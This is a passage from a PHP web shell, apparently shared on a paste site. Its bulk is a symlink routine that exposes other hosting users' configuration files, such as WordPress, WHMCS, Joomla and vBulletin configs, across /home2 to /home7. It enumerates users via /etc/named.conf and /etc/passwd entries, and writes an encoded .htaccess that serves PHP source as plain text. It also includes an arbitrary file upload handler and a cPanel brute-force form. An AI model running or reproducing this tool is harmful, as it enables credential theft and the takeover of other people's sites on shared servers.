  258. symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  259. symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  260. symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  261. symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  262. symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  263. symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  264. symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  265. symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  266. symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  267. symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  268. symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  269. symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  270. symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  271. symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  272. symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  273. symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  274. symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  275. symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  276. symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  277. symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  278. symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  279. symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  280. symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  281. symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  282. symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  283. symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  284. symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  285. symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  286. symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  287. symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  288. symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  289. symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  290. symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  291. symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  292. symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  293. symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  294. symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  295. symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  296. symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  297. symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  298. symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  299. symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  300. symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  301. symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  302. symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  303. symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  304. symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  305. symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  306. symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  307. symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  308. symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  309. symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  310. symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  311. symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  312. symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  313. symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  314. symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  315. symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  316. symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  317. symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  318. symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  319. symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  320. symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  321. symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  322. symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  323. symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  324. symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  325. symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  326. symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  327. symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  328. symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  329. symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  330. symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  331. symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  332. symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  333. symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  334. symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  335. symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  336. symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  337. symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  338. symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  339. symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  340. symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  341. symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  342. symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  343. symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  344. symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  345. symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  346. symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  347. symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  348. symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  349. symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  350. symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  351. symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  352. symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  353. symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  354. symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  355. symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  356. symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  357. symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  358. symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  359. symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  360. symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  361. symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  362. symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  363. symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  364. symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  365. symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  366. symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  367. symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  368. symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  369. symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  370. symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  371. symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  372. symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  373. symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  374. symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  375. symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  376. symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  377. symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  378. symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  379. symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  380. symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  381. symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  382. symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  383. symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  384. symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  385. symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  386. symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  387. symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  388. symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  389. symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  390. symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  391. symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  392. symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  393. symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  394. symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  395. symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  396. symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  397. symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  398. symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  399. symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  400. symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  401. symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  402. symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  403. symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  404. symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  405. symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  406. symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  407. symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  408. symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  409. symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  410. symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  411. symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  412. symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  413. symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  414. symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  415. symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  416. symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  417. symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  418. symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  419. symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  420. symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  421. symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  422. symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  423. }
  424.  
  425. $d0mains = @file("/etc/named.conf");
  426.  
  427. if($d0mains)
  428. {
  429. mkdir($fn);
  430. chdir($fn);
  431.  
  432. foreach($d0mains as $d0main)
  433. {
  434. if(eregi("zone",$d0main))
  435. {
  436. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  437. flush();
  438.  
  439. if(strlen(trim($domains[1][0])) > 2)
  440. {
  441. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  442.  
  443. syml($user['name'],$domains[1][0]);
  444. }
  445. }
  446. }
  447. echo "<center><font color=lime size=3>[ Done ]</font></center>";
  448. echo "<br><center><a href=$fn/ target=_blank><font size=5 color=#009900>| Go Here |</font></a></center>";
  449. }
  450. else
  451. {
  452. mkdir($fn);
  453. chdir($fn);
  454. $temp = "";
  455. $val1 = 0;
  456. $val2 = 1000;
  457. for(;$val1 <= $val2;$val1++)
  458. {
  459. $uid = @posix_getpwuid($val1);
  460. if ($uid)
  461. $temp .= join(':',$uid)."\n";
  462. }
  463. echo '<br/>';
  464. $temp = trim($temp);
  465.  
  466. $file5 = fopen("test.txt","w");
  467. fputs($file5,$temp);
  468. fclose($file5);
  469. $htaccess =
  470. 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
  471. aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
  472. biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
  473. ';
  474. $file = fopen(".htaccess","w+");
  475. $write = fwrite ($file ,base64_decode($htaccess));
  476.  
  477. $file = fopen("test.txt", "r") or exit("Unable to open file!");
  478. while(!feof($file))
  479. {
  480. $s = fgets($file);
  481. $matches = array();
  482. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  483. $matches = str_replace("home/","",$matches[1]);
  484. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  485. continue;
  486. syml($matches,$matches);
  487. }
  488. fclose($file);
  489. echo "</table>";
  490. unlink("test.txt");
  491. echo "<center><font color=lime size=3>[ Done ]</font></center>";
  492. echo "<br><center><a href=$fn/ target=_blank><font size=5 color=#009900>| Go Here |</font></a></center>";
  493. }
  494. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."><< BACK</a>";
  495. exit;
  496. }
  497. if(isset($_REQUEST['do'])){
  498. switch ($_REQUEST['do']){
  499. case 'error';
  500. echo '<center><form action="" method="post" enctype="multipart/form-data" name="uploader" id="error">';
  501. echo '<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="error"></form></center>';
  502. if( $_POST['_upl'] == "error" ) {
  503. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo ''; }
  504. else { echo '
  505. '; }
  506. }
  507. break;
  508. }}
  509. ?>
  510. <form method="POST" target="_blank">
  511. <strong>
  512. <input name="page" type="hidden" value="find"><table>
  513. </strong><br><br><center><font size="3" align="center" style="italic" color="#00ff00"></font></center><br>
  514. <table width="600" border="0" class="tabnet" cellpadding="3" cellspacing="1" align="center">
  515. <tr>
  516. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  517. <center><font size="5" face="impact" color="red">Cpanel Brute Force</center></font>
  518. <tr>
  519. <td>
  520. <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
  521. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  522. <font size="4" face="impact" color="green">Username List :</td></center></font>
  523. <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="usernames"><?php system('ls /var/mail');?></textarea></strong></td>
  524. </tr>
  525. <tr>
  526. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  527. <font size="4" face="impact" color="green">Password List :</td></center></font>
  528. <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="passwords"></textarea></strong></td>
  529. </tr>
  530. <tr>
  531. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  532. <center><font size="4" face="impact" color="green">Type :</center></font>
  533. <td valign="top" bgcolor="#151515" colspan="5">
  534. <span class="style2"><font size="3" face="impact" color="green"> Simple : </center></font> </span>
  535. <strong>
  536. <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
  537. <span class="style2"><font size="3" face="impact" color="green">/etc/passwd : </center></font> </span>
  538. <strong>
  539. <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
  540. </strong>
  541. </span>
  542. </td>
  543. </tr>
  544. <tr>
  545. <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  546. <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="Start">
  547. </strong>
  548. </td>
  549. <tr>
  550. </form>
  551. <tr>
  552. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><center><font size="4" face="impact" color="green"> Get Config </center></font></td>
  553. </tr>
  554. <form method="POST" target="_blank">
  555. <strong>
  556. <input name="mendapatkan" type="hidden" value="passwd">
  557. </strong>
  558. <tr>
  559. <td valign="top" bgcolor="#151515" style="width: 139px"><font size="4" face="impact" color="green"> Folder : </font>
  560. <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="50" name="foldername" type="text"></strong></td>
  561. </strong>
  562. </td>
  563. </tr>
  564. <tr>
  565. <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  566. <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
  567. </strong>
  568. </td>
  569. <tr>
  570. </form>
  571. <tr>
  572. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><center><font size="4" face="impact" color="green"> Get Wordlist </center></font></td>
  573. </tr>
  574. <form method="POST" target="_blank">
  575. <strong>
  576. <input name="pass" type="hidden" value="password">
  577. </strong>
  578. <tr>
  579. <td valign="top" bgcolor="#151515" style="width: 139px"><font size="4" face="impact" color="green"> URL Config : </center></font></td>
  580. <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="50" name="url" type="text" value="Link OF Configs"></strong></td>
  581. </strong>
  582. </td>
  583. </tr>
  584. <tr>
  585. <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  586. <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
  587. </strong>
  588. </td>
  589. <tr>
  590. </form>
  591. <tr>
  592. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><center><strong></strong></center></td>
  593. </tr>
  594. <tr>
  595. <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
  596. <td valign="top" bgcolor="#151515" colspan="5">
  597. <strong>
  598. </center>
Add Comment
Please, Sign In to add comment